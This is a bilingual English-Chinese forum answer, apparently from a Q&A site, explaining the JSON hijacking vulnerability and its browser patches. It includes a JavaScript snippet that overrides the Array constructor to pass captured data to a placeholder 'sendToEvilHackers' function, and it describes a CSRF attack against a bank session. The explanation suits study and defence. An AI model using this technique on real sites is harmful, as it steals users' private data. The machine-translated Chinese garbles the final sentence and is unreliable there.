This is because a few years ago Jeremiah Grossman found a very interesting vulnerability that affects gmail. Some people have addressed this vulnerabilty by using an unparseable cruft(Mr bobince's technical description on this page is fantastic.)

这是因为几年前 Jeremiah Grossman 发现了一个影响 gmail的非常有趣的漏洞。有些人通过使用无法解析的 cruft解决了这个漏洞（bobince 先生在此页面上的技术描述非常棒。）

The reason why Microsoft is talking about this is because they haven't patched their browser (yet). (Edit:Recent versions of Edge and IE 10/11 have addressed this issue.) Mozilla considers this to be a vulnerability in the json specification and therefore they patched it in Firefox 3. For the record I completely agree with Mozilla, and its unfortunate but each web app developer is going to have to defend them selves against this very obscure vulnerability.

微软之所以谈论这个是因为他们还没有修补他们的浏览器（还）。（编辑：Edge 和 IE 10/11 的最新版本已经解决了这个问题。）Mozilla 认为这是 json 规范中的一个漏洞，因此他们在Firefox 3 中修补了它。就记录而言，我完全同意 Mozilla，这很不幸，但每个 Web 应用程序开发人员都必须保护自己免受这个非常模糊的漏洞的影响。

I think it's because the Array() constructor can be redefined. However, that problem isn't really unique to arrays.

我认为这是因为可以重新定义 Array() 构造函数。然而，这个问题并不是数组独有的。

I think the attack (or one possible way) is something like this:

我认为攻击（或一种可能的方式）是这样的：

function Array(n) {
  var self = this;
  setTimeout(function() {
    sendToEvilHackers(self);
  }, 10);
  return this;
}

The browser (or some browsers) use that constructor for [n, n, n]array notation. A CSRF attack can therefore exploit your open session with your bank, hit a known JSON URL with a <script>tag to fetch it, and then poofyou are owned.

浏览器（或某些浏览器）使用该构造函数进行[n, n, n]数组表示法。因此，CSRF 攻击可以利用您与银行的公开会话，点击带有<script>标签的已知 JSON URL以获取它，然后便证明您拥有它。